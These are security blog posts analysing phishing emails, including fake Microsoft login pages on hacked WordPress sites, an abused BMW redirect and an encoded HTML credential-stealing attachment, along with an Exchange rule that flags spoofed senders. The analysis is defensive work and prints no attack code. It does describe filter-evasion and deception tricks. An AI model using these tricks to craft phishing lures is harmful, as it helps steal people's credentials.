UK born, US based InfoSec Guy
User received an email
Yes, there is even more to it, even more disclaimers
The ‘attached’ file, is a link elsewhere, of course
That link goes to the fake PDF page
That link goes to another page that is using the wrong cert so you get a warning
Sadly at this point it 404d out
But it would have been a fake Microsoft login page we’ve seen before
Until next time, stay safe out there
From a local county email address, asking me to ‘please complete the required training’. Takes you to a hacked wordpress site (based on the wp-crons URL)
Gives a fairly standard fake OWA login page
Then asks for more info
Note: DD/MM/YYYY not MM/DD/YYYY oddly. Are they targeting Europe?
Then you have to ‘wait’ for security (i.e. make it look like it’s doing something)
Then you get a nice word doc. Oddly it didn’t redirect me (was that bit broken?), but commonly they will bounce you over to the real outlook site.
Throwing it at Virus Total doesn’t find anything
I used an online viewer to check the document and it really is an employee evaluation form
This is to try to make the recipient not question it, at least not until later when they try to take the completed for to HR!
Stay safe out there
Note the spaces in 365, presumably to try to avoid filters looking for ‘365’.
The link I find interesting (and annoying)
Looks like it’s going to BMW USA.com. And it really is! It uses them to redirect. Not sure how, or why that works (my guess is it’s used to redirect to your local BMW retailer or something).
Interestingly they do some form of lookup for the ID. I tried a few random ones which didn’t work. So maybe dealer ID or similar?
I’ve seen a trend of this recently, where spammers are using legitimate companies as relays, so it looks more legitimate. All the ‘usual’ checks like newly registered domains, does it have links online (Alexa scores or similar) will be passed by using an actual website
I just heard back from BMW this morning that this was fixed hence the post now, nine months later about it 🙂
In short, you should have warnings on external emails. Yes in Outlook you can look at the address, but on other platforms (Apple for one) it just shows the ‘from’ name. Also if you spoof an internal email Outlook will ‘helpfully’ look up the photo of the person and add that for you making it look like the person actually sent the email!
As mentioned in the last post, I based all of this from this post on external email warnings. But I did create a second one for spoofed emails which matches:
If the message:
Sender's address domain portion belongs to any of these domains: 'company.com' or 'company.org'
and Is received from 'Outside the organization'
Take the following actions:
Prepend the message with the disclaimer 'WARNING: Please contact IT - this email appears to be a Phishing attempt'. If the disclaimer can't be applied, attach the message to a new disclaimer message.
Except if the message:
Is received from 'Partner company that sends emails as us'Basically any emails from external that claims to be from an internal domain flag them. I highly recommend that you test this first, as there will be domains you will have to exclude from this. Like payroll companies and similar that email as your company. But it should help with phishing emails.
Security should be like olden castles. Not just one door to get in, but moats, multiple walls, towers etc. Multiple defenses to stop the bad guys. Assume they will get in, but then they have to avoid all your traps to remain undetected. This is just one of many things you can do to protect yourself.
Until next time, stay safe out there.
Another phishing email. I’ll explain the boxes at the top later – that is me, not the email. Blurred regions are emails
Again, links go to some website. WordPress again. People, you need to update your WordPress! And stop using all the plugins
No, I’m not saying WordPress is terrible. I’m using it for this site. I’m saying (as with all things) you need to patch early, and patch often! Too many times people spin up a WordPress site then basically ignore it for update, and then it gets hacked.
The link (once I changed the email address) goes to a fake login page. Interestingly not a fake Microsoft, just a random one. It pulls the name after the @ to put it in the blurred regions. So lets say it was ‘[email protected]’ you were using, it says ‘Whitehouse Online Webmail App’. Also, Copyright 2019?
Then the usual trick of saying your password is wrong, to make people re-enter to confirm they were entering it correctly
Then the ‘you fixed it’ message (and now copyright 2018?)
And it redirects you to the domain for your email.
Now to explain the boxes on the email. Microsoft Rules, basically. The red one triggers on any email from external, that doesn’t match our domain. Then you have to whitelist anything that legitimately spoofs your domain. The yellow one is just triggered on any external emails. Not 100% but works pretty well. I should do another post explaining it, but in short I used this and made a second one based off of that.
Stay safe out there
I’ve had several users reporting phishing emails. Lets look at one of them.
A user received an email that just said “You’ve recieved [sic] a document on Onedrive.” It had an attached HTML document. They correctly reported it (yay!) and I looked at it. And it looks like a lazy scammer, because it should probably say “You’ve received a voicemail“. But more on that later.
First of all, I have HTML files opening by default in VSCodium (so I can’t accidentally run any of this), but if you open the file it looks… well horrible.
And this goes on and on and on
Now, as I’m not Neo, I don’t know what that means. But the cyberchef tool from GCHQ will tell you. Just run the URL decode function, which should be right here. Copy and paste the bits between unescape(‘THE BITS HERE’) and drop it in to cyberchef to see the HTML code created
Looks like making a fake Microsoft login page there. You can quickly look at the URLs it tries to load to have a quick look and what is going on
Nothing particularly odd here (yet). Using bootstrap and cloudflare, which makes sense as that would look ‘normal’ if you are checking. But that was just the first of three encoded bits. The second looks more interesting (email highlighted edited to a nonsense one)
CyberChef again to the rescue to see
And there is the fake login
Now let’s look at the third section and any http links
Well that looks interesting. Looks like it sends the email address there (I’m sure to autopopulate to make it look more legitimate). There are two more links that are interesting. Lets look at the first one
This time sending the username and password to that website for attempting to log in to Microsoft. That website doesn’t appear to be working right. Now lets look at the other interesting link
This one is the most interesting, and why I think it should have said voicemail and not document. If you go there, it plays an archive.org file of a voicemail saying “Hi, please give me a call, thank you, bye“. This might actually possibly the cleverest bit of this as you just think it’s a wrong number and move on. If you click something and nothing happens, you start to question it. If you click something and something opens, you don’t.
Now this is as far as I’m taking it. The website is down, my user didn’t click the link, and the email was spoofed from the user, so there isn’t really much more I can do. If the website was up, it wouldn’t be too hard to set up a python script to make up random email addresses and passwords, but in my mind that crosses the line unless you can guarantee that only email addresses you control are used. While it’s astronomically unlikely you will get a valid username and password, you might end up locking a valid email account out.
Until next time, stay safe out there.
Xoke's dot com 